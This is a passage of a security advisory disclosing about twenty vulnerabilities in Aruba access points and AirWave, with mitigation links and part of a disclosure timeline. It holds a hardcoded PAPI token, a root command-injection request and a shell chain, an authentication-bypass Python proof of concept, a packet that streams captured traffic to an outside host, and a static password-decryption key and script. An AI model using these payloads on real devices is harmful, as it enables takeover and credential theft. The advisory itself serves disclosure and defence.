The following dissection of the above shown packet gives a more detailed
overview of the format:
49 72 ID
00 02 Version
64 69 86 2d PAPI Destination IP
7f 00 00 01 PAPI Source IP
01 00 Unknown1
01 00 Unknown2
20 1f PAPI Source Port
20 1e PAPI Destination Port
00 01 Unknown3
00 00 Unknown4
00 01 Sequence Number
3e f9 Unknown5
22 49 05 b3 50 89 40 d3 5d 9d d6 af 46 98 c1 a6 Checksum
The checksum is based on a MD5 hash of a padded concatenation of all fields and
a secret token. The secret token is hardcoded in multiple binaries on the AMP
and can easily be retrieved via core Linux system tools:
$ strings /opt/airwave/bin/msgHandler | grep asd
asdf;lkj763
Using this secret token it is possible to craft valid PAPI packets and issue
commands to the AMP, bypassing the authentication based on the shared
secret / token. This can be exploited to compromise of the device.
Random sampling of different software versions available on
Aruba's website confirmed that the shared secret is identical for all versions.
-------------------------------------------------------
5. AP: Insecure transmission of login credentials (GET)
-------------------------------------------------------
Username and password to authenticate with the AP web frontend are transmitted
through HTTP GET. This method should not be used in a form that transmits
sensitive data, because the data is displayed in clear text in the URL.
GET /swarm.cgi?opcode=login&user=admin&passwd=admin HTTP/1.1
The login URL can potentially appear in Proxy logs, the server logs or
browser history. This possibly discloses the authentication data to
unauthorized persons.
--------------------------------------------
6. AP: Built in privileged "support" account
--------------------------------------------
The APs provide a built in system account called "support". When connected to
the restricted shell of the AP via SSH, issuing the command "support", triggers
a password request:
00:0b:86:XX:XX:XX# support
Password:
A quick internet search clarified, that this password is meant for use by Aruba
engineers only:
http://community.arubanetworks.com/t5/Unified-Wired-Wireless-Access/OS5-0-support-password/td-p/26760
Further research on that functionality lead to the conclusion that this
functionality provides root-privileged shell access to the underlying operating
system of the AP, given the correct password is entered.
-----------------------------------------------
7. AP: Static password hash for support account
-----------------------------------------------
The password hash for the "support" account mentioned in vulnerability #6 is
stored in plaintext on the AP.
$ strings /aruba/bin/cli | grep ^bc5
bc54907601c92efc0875233e121fd3f1cebb8b95e2e3c44c14
Random sampling of different versions of Firmware images available on Aruba's
website confirmed that the password hash is identical for all versions. The
password check validating a given "support" password is based on the following
algorithm:
SALT + sha1(SALT + PASSWORD)
Where SALT equals the first 5 bytes of the password hash in binary
representation. It is possible to run a brute-force attack on this hash format
using JtR with the following input format:
support:$dynamic_25$c92efc0875233e121fd3f1cebb8b95e2e3c44c14$HEX$bc54907601
------------------------------------------------------
8. AP: Unusual account identified ("arubasecretadmin")
------------------------------------------------------
The AP's system user configuration contains a undocumented account called
"arubasecretadmin". This account was the root cause for CVE-2007-0932 and
allowed administrative login with a static password.
/etc/passwd:
nobody:x:99:99:Nobody:/:/sbin/nologin
root:x:0:0:Root:/:/bin/sh
admin:x:100:100:Admin:/:/bin/telnet3
arubasecretadmin:x:101:100:Aruba Admin:/:/bin/telnet2
serial:x:102:100:Serial:/:/bin/telnet4
Further tests indicated that login with this account seems not possible as it
is not mapped through Arubas authentication mechanisms. The reason for it being
still configured on the system is unknown.
---------------------------------------
9. AP: Privileged remote code execution
---------------------------------------
Insufficient checking of parameters allows an attacker to execute commands
with root privileges on the AP. The vulnerable parameter is "image_url" which
is used in the Firmware update function.
GET /swarm.cgi?opcode=image-url-upgrade&ip=127.0.0.1&oper_id=6&image_url=Aries@http://10.0.0.1/?"`/usr/sbin/mini_httpd+-d+/+-u+root+-p+1234+-C+/etc/mini_httpd.conf`"&auto_reboot=false&refresh=true&sid=OWsiU5MM7DxVf9FRWe3P&nocache=0.9368100591919084
HTTP/1.1
The above example starts a new instance of mini_httpd on tcp/1234, which allows
browsing the AP's filesystem. The following list of commands, if executed in
order, start a telnet service that allows passwordless root login.
killall -9 utelnetd
touch /tmp/telnet_enable
echo \#\!/bin/sh > /bin/login
echo /bin/sh >> /bin/login
chmod +x /bin/login
/sbin/utelnetd
Connecting to the telnet service started by the above command chain:
# telnet 10.0.XX.XX
Trying 10.0.XX.XX...
Connected to 10.0.XX.XX.
Escape character is '^]'.
Switching to Full Access
/aruba/bin # echo $USER
root
/aruba/bin #
Potential exploits of this vulnerability can be detected through the
AP's log file:
[...]
Jan 1 02:43:47 cli[2052]: <341004> <WARN> |AP
00:0b:86:XX:XX:XX2@10.0.XX.XX cli|
http://10.0.XX.XX/?"`/sbin/utelnetd`"
[...]
-------------------------------------------------------
10. AP: Radius passwords allow arbitrary raddb commands
-------------------------------------------------------
Insufficient checking of the GET parameter "cmd" allows the injection of
arbitrary commands and configuration parameters in the raddb configuration.
Example:
GET /swarm.cgi?opcode=config&ip=127.0.0.1&cmd=%27user%20foo%20foo%22,my-setting%3d%3d%22blah%20portal%0Ainbound-firewall%0Ano%20rule%0Aexit%0A%27&refresh=false&sid=Lppj9jT2xQmYKqjEx5eP&nocache=0.10862623626107548
HTTP/1.1
/aruba/radius/raddb/users:
foo Filter-Id == MAC-GUEST, Cleartext-Password := "foo",my-setting=="blah"
As shown in the above example, inserting a double-quote in the password allows
to add additional commands after the password.
-----------------------------------------------------------
11. AP: Unauthenticated disclosure of environment variables
-----------------------------------------------------------
It is possible to request a listing of environment variables by requesting a
specific URL on the AP's web server. The request does not require
authentication.
GET /swarm.cgi?opcode=printenv HTTP/1.1
HTTP/1.0 200 OK
Content-Type:text/plain; charset=utf-8
Pragma: no-cache
Cache-Control: max-age=0, no-store
Environment variables
CHILD_INDEX=0
PATH=/usr/local/bin:/usr/ucb:/bin:/usr/bin
LD_LIBRARY_PATH=/usr/local/lib:/usr/lib
SERVER_SOFTWARE=
SERVER_NAME=10.0.XX.XX
GATEWAY_INTERFACE=CGI/1.1
SERVER_PROTOCOL=HTTP/1.0
SERVER_PORT=4343
REQUEST_METHOD=GET
SCRIPT_NAME=/swarm.cgi
QUERY_STRING=opcode=printenv
REMOTE_ADDR=10.0.XX.XX
REMOTE_PORT=58804
HTTP_REFERER=https://10.0.XX.XX:4343/
HTTP_USER_AGENT=Mozilla/5.0 (X11; Linux x86_64; rv:38.0)
Gecko/20100101 Firefox/38.0 Iceweasel/38.3.0
HTTP_HOST=10.0.XX.XX:4343
-----------------------------------------------------------------
12. AP: Information disclosure by firmware checking functionality
-----------------------------------------------------------------
When the AP checks device.arubanetworks.com for a new firmware version, it
sends detailed information of the AP in plaintext to the remote host.
POST /firmware HTTP/1.1
Host: device.arubanetworks.com
Content-Length: 2
Connection: keep-alive
X-Type: firmware-check
X-Guid: 2dbe42XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
X-OEM-Tag: Aruba
X-Mode: IAP
X-Factory-Default: Yes
X-Current-Version: 6.4.2.6-4.1.1.10_51810
X-Organization: ***REMOVED (Company Internal Name)***
X-Ap-Info: CC00XXXXX, 00:0b:86:XX:XX:XX, RAP-155
X-Features: 0000100001001000000000000000000000000000000000010000000
----------------------------------------------------------
13. AP: Unauthenticated automated firmware update requests
----------------------------------------------------------
The web frontend of the AP provides functionality to initiate an automated
firmware update. Doing so triggers the AP to initiate communication with
device.arubanetworks.com and automatically download and install a new firmware
image. The CGI opcode for that automatic update is "image-server-check" and it
was discovered that the "sid" parameter is not checked for this opcode. Therefor
an attacker can issue the automatic firmware update without authentication by
sending the following GET request to the AP.
GET /swarm.cgi?opcode=image-server-check&ip=127.0.0.1&sid=x
As shown above, the "sid" parameter has to be submitted as part of the URL, but
can be set to anything. Although all opcode actions follow the same calling
scheme, "image-server-check" was the only opcode where the session ID was not
validated.
Combined with other vulnerabilities (#14, #15), this could be exploited to
install an outdated, vulnerable firmware on the AP.
----------------------------------------------------
14. AP: Firmware updater does not check certificates
----------------------------------------------------
The communication between AP and device.arubanetworks.com is secured by using
SSL. The AP does not do proper certificate validation for the communication to
device.arubanetworks.com. A typical SSL MiTM attack using DNS spoofing and a
self-signed certificate allowed interception of the traffic between AP and
device.arubanetworks.com.
--------------------------------------------------
15. AP: Forceful downgrade of FW versions possible
--------------------------------------------------
When checking device.arubanetworks.com for a new firmware image, the AP sends
it's current version to the remote host. If there is no new firmware available,
device.arubanetworks.com does not provide any download options. If the initial
version sent from the AP is modified by an attacker (via MiTM), the remote
server will reply with the current firmware version. The AP will then reject
that firmware, as it's current version is more recent/the same. Downgrading the
version does also not work based on the validation the AP does.
This behaviour can be overwritten if an attacker intercepts and modifies the
reply from device.arubanetworks.com and adds X-header called
"X-Mandatory-Upgrade".
Example of a spoofed reply from device.arubanetworks.com:
HTTP/1.0 200 OK
Date: Wed, 11 Nov 2015 12:12:20 GMT
Content-Length: 91
Content-Type: text/plain; charset=UTF-8
X-Activation-Key: FXXXXXXX
X-Session-Id: 05d607dd-958b-42c4-a355-bd54e1a32e8e
X-Status-Code: success
X-Type: firmware-check
X-Mandatory-Upgrade: true
Connection: close
6.4.2.6-4.1.1.10_51810
23 http://10.0.0.1:4321/ArubaInstant_Aries_6.4.2.6-4.1.1.10_51810
As shown above, the Header "X-Mandatory-Upgrade" was added to the server's
reply. This causes the AP to skip its validation checks and accept any firmware
version provided, regardless if it is the same or older than the current one.
-----------------------------------------------------------
16. AP: Firmware update check discloses machine certificate
-----------------------------------------------------------
While observing the traffic between an AP and device.arubanetworks.com, it was
discovered that the AP discloses it's machine certificate to the remote
endpoint.
POST /firmware HTTP/1.1
Host: 10.0.XX.XX
Content-Length: 2504
Connection: close
X-Type: firmware-check
X-Guid: 2dbe42XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
X-OEM-Tag: Aruba
X-Mode: IAP
X-Factory-Default: Yes
X-Session-Id: e0b24fb1-e2f7-4e06-9473-1266b50a3fec
X-Current-Version: 6.4.2.6-4.1.1.10_51810
X-Organization: ***REMOVED (Company Internal Name)***
X-Ap-Info: CC00XXXXX, 00:0b:86:XX:XX:XX, RAP-155
X-Features: 0000100001001000000000000000000000000000000000010000000
X-Challenge-Hash: SHA-1
-----BEGIN CERTIFICATE-----
MIIGTjCCBTagAwI...
[...]
-----END CERTIFICATE-----
The certificate sent in the above request is the same (in PEM format) as found
under the following path on the AP:
/tmp/deviceCerts/certifiedKeyCert.der
Comparison of the certificate from the HTTP Request and from the AP filesystem:
$ sha256sum dumped-fw-cert.txt certifiedKeyCert.der.pem
68ebb521dff53d8dcb8e4a0467dcae38cf45a0d812897393632bdd9ef6f354e8
dumped-fw-cert.txt
68ebb521dff53d8dcb8e4a0467dcae38cf45a0d812897393632bdd9ef6f354e8
certifiedKeyCert.der.pem
---------------------------------------------------------
17. AP: Firmware is downloaded via unencrypted connection
---------------------------------------------------------
Firmware images are downloaded via unencrypted HTTP to the AP. An example reply
containing the download paths looks as follows:
HTTP/1.1 200 OK
Date: Wed, 11 Nov 2015 13:18:58 GMT
Content-Length: 552
Content-Type: text/plain; charset=UTF-8
X-Activation-Key: FXXXXXXX
X-Session-Id: 05d607dd-958b-42c4-a355-bd54e1a32e8e
X-Status-Code: success
X-Type: firmware-check
Connection: close
6.4.2.6-4.1.1.10_51810
25 http://images.arubanetworks.com/fwfiles/ArubaInstant_Centaurus_6.4.2.6-4.1.1.10_51810
30 http://images.arubanetworks.com/fwfiles/ArubaInstant_Taurus_6.4.2.6-4.1.1.10_51810
15 http://images.arubanetworks.com/fwfiles/ArubaInstant_Cassiopeia_6.4.2.6-4.1.1.10_51810
10 http://images.arubanetworks.com/fwfiles/ArubaInstant_Orion_6.4.2.6-4.1.1.10_51810
23 http://images.arubanetworks.com/fwfiles/ArubaInstant_Aries_6.4.2.6-4.1.1.10_51810
26 http://images.arubanetworks.com/fwfiles/ArubaInstant_Pegasus_6.4.2.6-4.1.1.10_51810
An attacker could potentially MiTM connections to images.arubanetworks.com and
possibly replace the firmware images downloaded by the AP.
----------------------------------------------------------------------
18. AP: Firmware update Challenge/Response does not protect the Client
----------------------------------------------------------------------
The update check process between AP and device.arubanetworks.com works
as follows:
AP => device.arubanetworks.com
POST /firmware
X-Type: firmware-check
AP <= device.arubanetworks.com
200 OK
X-Session-Id: bd4...
X-Challenge: 123123...
AP => device.arubanetworks.com
POST /firmware
X-Session-Id: bd4...
[machine certificate]
[signature]
AP <= device.arubanetworks.com
200 OK
X-Session-Id: bd4...
[firmware image urls]
When inspecting the communication process carefully, it is clear that the final
response from device.arubanetworks.com does not contain any (cryptographic)
signature. An attacker could impersonate device.arubanetworks.com, send an
arbitrary challenge, ignore the response and just reply with a list of firmware
images. The only thing that has to be kept the same over requests is the
X-Session-Id header, which is also sent initially by the remote host and not
the AP and therefore under full control of the attacker.
------------------------------------------
19. AP: Unencrypted private keys and certs
------------------------------------------
The AP firmware image contains the unencrypted private key and certificate for
securelogin.arubanetworks.com issued by GeoTrust and valid until 2017. The key
and cert was found under the path /aruba/conf/cpprivkey.pem.
$ openssl x509 -in cpprivkey.pem -text -noout
Certificate:
Data:
Version: 3 (0x2)
Serial Number: 121426 (0x1da52)
Signature Algorithm: sha1WithRSAEncryption
Issuer: C=US, O=GeoTrust Inc., OU=Domain Validated SSL,
CN=GeoTrust DV SSL CA
Validity
Not Before: May 11 01:22:10 2011 GMT
Not After : Aug 11 04:40:59 2017 GMT
Subject: serialNumber=lLUge2fRPkWcJe7boLSVdsKOFK8wv3MF,
C=US, O=securelogin.arubanetworks.com, OU=GT28470348, OU=See
www.geotrust.com/resources/cps (c)11, OU=Domain Control Validated -
QuickSSL(R) Premium, CN=securelogin.arubanetworks.com
[...]
$ openssl rsa -in cpprivkey.pem -check
RSA key ok
writing RSA key
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEA….
[...]
-----END RSA PRIVATE KEY-----
---------------------------------------
20. AP: Potential signature private key
---------------------------------------
A potential SSL key was found under the path /etc/sig.key. Based on the header
(3082xxxx[02,03]82), the file looks like a SSL key in DER format:
$ xxd etc/sig.key
00000000: 3082 020a 0282 0201 00d9 2d71 db0f decb 0.........-q....
It was not possible to decode the key. Therefore it's not 100% clear if is an
actual key or just a garbaged file.
------------------------------------------------
21. AP: PAPI Endpoints exposed to all interfaces
------------------------------------------------
The PAPI endpoint "msgHandler" creates listeners on all interfaces. Therefore
it is reachable via wired and wireless connections to the AP. This increases
the potential attack surface.
# netstat -nlu | grep :82
udp 0 0 :::8209 :::*
udp 0 0 :::8211 :::*
Additionally the local ACL table of the AP contains a default firewall rule,
permitting any traffic to udp/8209-8211, overwriting any manually set ACL to
block access to PAPI:
00:0b:86:XX:XX:XX# show datapath acl 106
Datapath ACL 106 Entries
-----------------------
Flags: P - permit, L - log, E - established, M/e - MAC/etype filter
S - SNAT, D - DNAT, R - redirect, r - reverse redirect m - Mirror
I - Invert SA, i - Invert DA, H - high prio, O - set prio, C -
Classify Media
A - Disable Scanning, B - black list, T - set TOS, 4 - IPv4, 6 - IPv6
K - App Throttle, d - Domain DA
----------------------------------------------------------------
1: any any 17 0-65535 8209-8211 P4
[...]
12: any any any P4
00:0b:86:XX:XX:XX#
------------------------------------------------------
22. AP: PAPI Endpoint does not validate MD5 signatures
------------------------------------------------------
MD5 signature validation for incoming PAPI packets is disabled on the AP:
# ps | grep msgHandler
1988 root 508 S < /aruba/bin/msgHandler -n
# /aruba/bin/msgHandler -h
usage: msgHandler [-d] [-n]
-d = enable debug prints.
-n = disable md5 signatures.
-g = disable garbling.
The watchdog service ("nanny") also restarts the PAPI handler with disabled MD5
signature validation:
# grep msgH /aruba/bin/nanny_list
RESTART /aruba/bin/msgHandler -n
--------------------------------------------------------------
23. AP: PAPI protocol encrypted with weak encryption algorithm
--------------------------------------------------------------
PAPI packets sent to an AP contain an encrypted payload. The encryption seems
to replace the MD5 signature check as described in #4 and used when PAPI is
sent from AP to AMP. This might also explain why the PAPI endpoint runs with
disabled MD5 signature verification on the AP (see #22).
The following example shows an encrypted PAPI packet for the command
"show version" as received by the AP:
0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............
0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ...........
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0040 00 00 00 00 00 00 00 00 00 00 00 00 97 93 93 93 ................
0050 a9 97 93 93 92 6e 96 99 93 93 92 95 94 91 93 97 .....n..........
0060 93 93 93 93 93 93 87 e9 eb e1 fc d0 dc c6 e4 fd ................
0070 fa e1 f7 e9 d1 a6 f7 e7 c5 eb f1 93 93 9e e0 fb ................
0080 fc e4 b3 e5 f6 e1 e0 fa fc fd 99 ...........
Important parts of the above packet:
7f 00 00 01 Destination IP (127.0.0.1)
0a 00 00 01 Source IP (10.0.0.1)
3b 60 Destination Port (15200)
3b 7e Source Port (15230)
97 93 93 93-EOF Encrypted PAPI payload
Comparison of the above packet with a typical PAPI packet that is sent from the
AP to the AMP quickly highlights the missing 0x00 that are used to pad certain
fields of the PAPI payload. These 0x00 seem to be substituted with 0x93, which
is a clear indication that the payload is "encrypted" with a 1 byte XOR. As
XOR'ing 0x00 with 1 byte results in the same byte, the payload therefore
discloses the key used and use of the weak XOR algorithm:
0x00: 00000000
^ 0x93: 10010011
================
10010011 (0x93)
The following shows the above PAPI packet for "show version" with its payload
decrypted:
0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............
0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ...........
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0040 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 ................
0050 3a 04 00 00 01 fd 05 0a 00 00 01 06 07 02 00 04 :...............
0060 00 00 00 00 00 00 14 7a 78 72 6f 43 4f 55 77 6e .......zxroCOUwn
0070 69 72 64 7a 42 35 64 74 56 78 62 00 00 0d 73 68 irdzB5dtVxb...sh
0080 6f 77 20 76 65 72 73 69 6f 6e 0a ow version.
(The string starting with "zxr..." is a HTTP session ID, see #25 on details how
to bypass this).
An example Python function for en-/decrypting PAPI payloads could look like
this:
def aruba_encrypt(s):
return ''.join([chr(ord(c) ^ 0x93) for c in s])
-------------------------------------------
24. AP: PAPI protocol authentication bypass
-------------------------------------------
Besides it's typical use between different Aruba devices, PAPI is also used as
an inter-process communication (IPC) mechanism between the CGI based web
frontend and the backend processes on the AP. Certain commands that can be sent
via PAPI are only supposed to be used via this IPC interface and not from an
external source. Besides the weak "encryption" that is described in #23, some
PAPI packets contain a HTTP session ID (SID), that matches the SID issued at
login to the web frontend.
Example IPC packet (payload decrypted as shown in #23):
0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............
0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ...........
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0040 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 ................
0050 40 04 00 00 01 fd 05 0a 00 00 01 06 07 02 00 04 @...............
0060 00 00 00 00 00 00 14 7a 78 72 6f 43 4f 55 77 6e .......zxroCOUwn
0070 69 72 64 7a 42 35 64 74 56 78 62 00 00 13 73 68 irdzB5dtVxb...sh
0080 6f 77 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e ow configuration
0090 0a .
The SID in the example shown is "zxroCOUwnirdzB5dtVxb". The 0x14 before that
indicates the length of the 20 byte SID. If the session is expired or an
invalid session is specified, the packet is rejected by the PAPI endpoint
(msgHandler).
Replacing the 20 byte SID with 20 * 0x00, bypasses the SID check and therefore
allows unauthenticated PAPI communication with the AP.
Example IPC packet (Session ID replaced with 20 * 0x00, payload not XOR'ed for
readability):
0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............
0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ...........
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0040 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 ................
0050 40 04 00 00 01 fd 05 0a 00 00 01 06 07 02 00 04 @...............
0060 00 00 00 00 00 00 14 00 00 00 00 00 00 00 00 00 ................
0070 00 00 00 00 00 00 00 00 00 00 00 00 00 13 73 68 ..............sh
0080 6f 77 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e ow configuration
0090 0a
Using the above example, it is possible to request the system configuration
from an AP, bypassing all authentication methods.
If the above packet is sent using IPC from the webfrontend cgi to the backend,
(localhost) the reply looks like follows:
msg_ref 303 /tmp/.cli_msg_SW9iVE
The cgi binary then reads this file and renders the content in the HTTP reply.
If the PAPI packet comes from an external address (instead of localhost) the
reply points to the APs web server (10.0.0.26 in this case) instead of /tmp/:
msg_ref 2689 http://10.0.0.26/.cli_msg_n011xh
Access to this file does not require authentication which raises the severity
of this vulnerability significantly.
The following Python script is a proof of concept for this vulnerability,
sending a "show configuration" packet to an AP with the IP address 10.0.0.26:
import socket
def aruba_encrypt(s):
return ''.join([chr(ord(c) ^ 0x93) for c in s])
header = (
'\x49\x72\x00\x03\x7f\x00\x00\x01\x0a\x00\x00\x01\x00\x00\x20\x13'
'\x3b\x60\x3b\x7e\x20\x04\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
)
payload = ( # show configuration
'\x04\x00\x00\x00\x40\x04\x00\x00\x01\xfd\x05\x0a\x00\x00\x01\x06'
'\x07\x02\x00\x04\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x13\x73\x68\x6f\x77\x20\x63\x6f\x6e\x66\x69\x67\x75\x72\x61'
'\x74\x69\x6f\x6e\x0a'
)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('', 1337))
sock.sendto(header + aruba_encrypt(payload), ('10.0.0.26', 8211))
buff = sock.recvfrom(4096)
print aruba_encrypt(buff[0])
Executing the above PoC:
# python arupapi.py
[...]msg_ref 2689 http://10.0.0.26/.cli_msg_n011xh
Downloading the file referenced by the reply returns the full AP configuration,
including all users, passwords and settings (no auth is required on the HTTP
request either):
# curl -Lk http://10.0.0.26/.cli_msg_n011xh
version 6.4.2.0-4.1.1
virtual-controller-country XX
virtual-controller-key b49ff***REMOVED***
name instant-XX:XX:XX
terminal-access
clock timezone none 00 00
rf-band all
[...]
mgmt-user admin f9ac59cd431e174fb07539a8a811a1aa
[...]
(full configuration file continues)
For APs running in "managed mode", the above shown exploit does not work. The
reason for that is, that these APs don't provide a web server and have only a
limited set of commands that can be executed via PAPI.
Additionally, APs in managed mode do not seem to use the XOR based "encryption"
or MD5 checksums - there was no authentication/encryption found at all.
One interesting payload for APs in "managed mode" using the limited subset of
available commands is the ability to capture traffic and send it to a remote
endpoint via UDP. The example command on the controller would be:
(aruba_7030_1) #ap packet-capture raw-start ip-addr 192.168.0.1
100.105.134.45 1337 0 radio 0
This command would send all traffic of AP 192.168.0.1 from the first radio
interface in PCAP format to 100.105.134.45:1337. Wrapped in PAPI, the Packet
would look like this:
0000 49 72 00 03 c0 a8 00 01 7f 00 00 01 00 00 00 00 Ir..............
0010 20 21 20 1c 20 04 01 48 14 08 36 b1 00 00 00 00 ! . ..H..6.....
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 65 ...............e
0050 78 65 63 75 74 65 43 6f 6d 6d 61 6e 64 4f 62 6a xecuteCommandObj
0060 65 63 74 02 06 02 04 03 00 08 03 00 08 00 00 04 ect.............
0070 38 32 32 35 02 06 02 04 00 00 00 03 00 00 02 00 8225............
0080 02 01 04 00 00 00 08 00 00 02 41 50 00 00 02 41 ..........AP...A
0090 50 00 00 0e 50 41 43 4b 45 54 2d 43 41 50 54 55 P...PACKET-CAPTU
00a0 52 45 00 00 0e 50 41 43 4b 45 54 2d 43 41 50 54 RE...PACKET-CAPT
00b0 55 52 45 00 00 09 52 41 57 2d 53 54 41 52 54 00 URE...RAW-START.
00c0 00 09 52 41 57 2d 53 54 41 52 54 00 00 07 49 50 ..RAW-START...IP
00d0 2d 41 44 44 52 00 00 0b 31 39 32 2e 31 36 38 2e -ADDR...192.168.
00e0 30 2e 31 00 00 09 74 61 72 67 65 74 2d 69 70 00 0.1...target-ip.
00f0 00 0e 31 30 30 2e 31 30 35 2e 31 33 34 2e 34 35 ..100.105.134.45
0100 00 00 0b 74 61 72 67 65 74 2d 70 6f 72 74 00 00 ...target-port..
0110 04 31 33 33 37 00 00 06 66 6f 72 6d 61 74 00 00 .1337...format..
0120 01 30 00 00 05 52 41 44 49 4f 00 00 01 30 04 00 .0...RADIO...0..
0130 00 00 00 02 00 02 01 02 00 02 00 00 00 04 73 65 ..............se
0140 63 61 00 00 04 72 6f 6f 74 ca...root
When sending this packet to an AP running in managed mode, it confirms the
command and starts sending traffic to the specified host:
[...]<re><data name="Packet capture has started for pcap-id"
pn="true">1</data></re>
---------------------------------------------------------
25. AP: Broadcast with detailed system information (LLDP)
---------------------------------------------------------
Aruba APs broadcast detailed system and version information to the wired
networks via LLDP (Link Layer Discovery Protocol).
0000 02 07 04 00 0b 86 9e 7a 32 04 07 03 00 0b 86 9e .......z2.......
0010 7a 32 06 02 00 78 0a 11 30 30 3a 30 62 3a 38 36 z2...x..00:0b:86
0020 3a XX XX 3a XX XX 3a XX XX 0c 3a 41 72 75 62 61 :XX:XX:XX.:Aruba
0030 4f 53 20 28 4d 4f 44 45 4c 3a 20 52 41 50 2d 31 OS (MODEL: RAP-1
0040 35 35 29 2c 20 56 65 72 73 69 6f 6e 20 36 2e 34 55), Version 6.4
0050 2e 32 2e 36 2d 34 2e 31 2e 31 2e 31 30 20 28 35 .2.6-4.1.1.10 (5
0060 31 38 31 30 29 0e 04 00 0c 00 08 10 0c 05 01 0a 1810)...........
0070 00 00 22 02 00 00 00 0e 00 08 04 65 74 68 30 fe .."........eth0.
0080 06 00 0b 86 01 00 01 fe 09 00 12 0f 03 00 00 00 ................
0090 00 00 fe 09 00 12 0f 01 03 6c 03 00 10 fe 06 00 .........l......
00a0 12 0f 04 06 76 00 00 ....v..
The broadcast packet contains the APs MAC address, model number and exact
firmware version.This detailed information could aid an attacker to easily find
and identify potential targets for known vulnerabilities.
------------------------------------------------------
26. AP: User passwords are encrypted with a static key
------------------------------------------------------
Based on the vulnerability shown in #24 which potentially discloses the
password hashes of AP user accounts, the implemented hashing algorithm was
tested. CVE-2014-7299 describes the password hashes as "encrypted password
hashes". The following line shows the mgmt-user configuration for the user
"admin" with password "admin":
mgmt-user admin f9ac59cd431e174fb07539a8a811a1aa
Some testing with various passwords and especially password lengths showed that
the passwords are actually encrypted and not hashed (as hash algorithms produce
the same length output for different length input):
f9ac59cd431e174fb07539a8a811a1aa # admin
d7a75c655b8e2fb8609d0b04275e02767f2dfae8c63088cf # adminadmin
The encryption algorithm used for the above passwords turned out to be 3DES in
CBC mode. The encryption algorithm uses a 24 byte static key which is hardcoded
on the AP. Sampling of different Firmware versions confirmed that the key is
identical for all available versions. The IV required for 3DES consists of 8
random bytes, and is stored as the first 8 byte of the encrypted password. The
following Python script can be used to decrypt the above hashes:
import pyDes
hashes = (
'f9ac59cd431e174fb07539a8a811a1aa', # admin
'd7a75c655b8e2fb8609d0b04275e02767f2dfae8c63088cf' # adminadmin
)
key = (
'\x32\x74\x10\x84\x91\x17\x75\x46\x14\x75\x82\x92'
'\x43\x49\x04\x59\x18\x69\x15\x94\x27\x84\x30\x03'
)
for h in hashes:
d = pyDes.triple_des(key, pyDes.CBC, h.decode('hex')[:8], pad='\00')
print h, '=>', d.decrypt(h.decode('hex')[8:])
Mitigation
==========
Aruba released three advisories, related to the issues reported here:
http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-004.txt
http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-005.txt
http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-006.txt
Following the resolution advises given in those advisories is strongly
recommended. These advisories are also available on the Aruba security bulletin:
http://www.arubanetworks.com/support-services/security-bulletins/
For the vulnerabilities related to PAPI, Aruba has made the following document
available:
http://community.arubanetworks.com/aruba/attachments/aruba/aaa-nac-guest-access-byod/25840/1/Control_Plane_Security_Best_Practices_1_0.pdf
This doc gives several advises how to remediate the PAPI related
vulnerabilities. An update fixing the issues is announced for Q3/2016.
For further information there is also a discussion thread in Aruba's Airheads
Community Forum:
http://community.arubanetworks.com/t5/AAA-NAC-Guest-Access-BYOD/Security-vulnerability-advisories/m-p/266095#M25840
Author
======
The vulnerabilities were discovered by Sven Blumenstein from Google Security
Team.
Timeline
========
2016/01/22 - Security report sent to sirt@arubanetworks.com with 90 day
disclosure deadline (2016/04/22).
2016/01/22 - Aruba acknowledges report and starts working on the issues.
2016/02/01 - Asking Aruba for ETA on detailed feedback.
2016/02/03 - Detailed feedback for all reported vulnerabilities received.
2016/02/16 - Answered several questions from the feedback, asked Aruba for
patch ETA.
2016/02/29 - Pinged for patch ETA.
2016/03/08 - Pinged for patch ETA.
2016/03/12 - Received detailed list with approx. ETA for patch releases and
current status.
2016/03/21 - Aruba asks for extension of 90 day disclosure deadline.
2016/03/24 - Asked Aruba for exact patch release dates.
2016/04/02 - Aruba confirmed 4.2.x branch update for 2016/04/15, 4.1.x branch
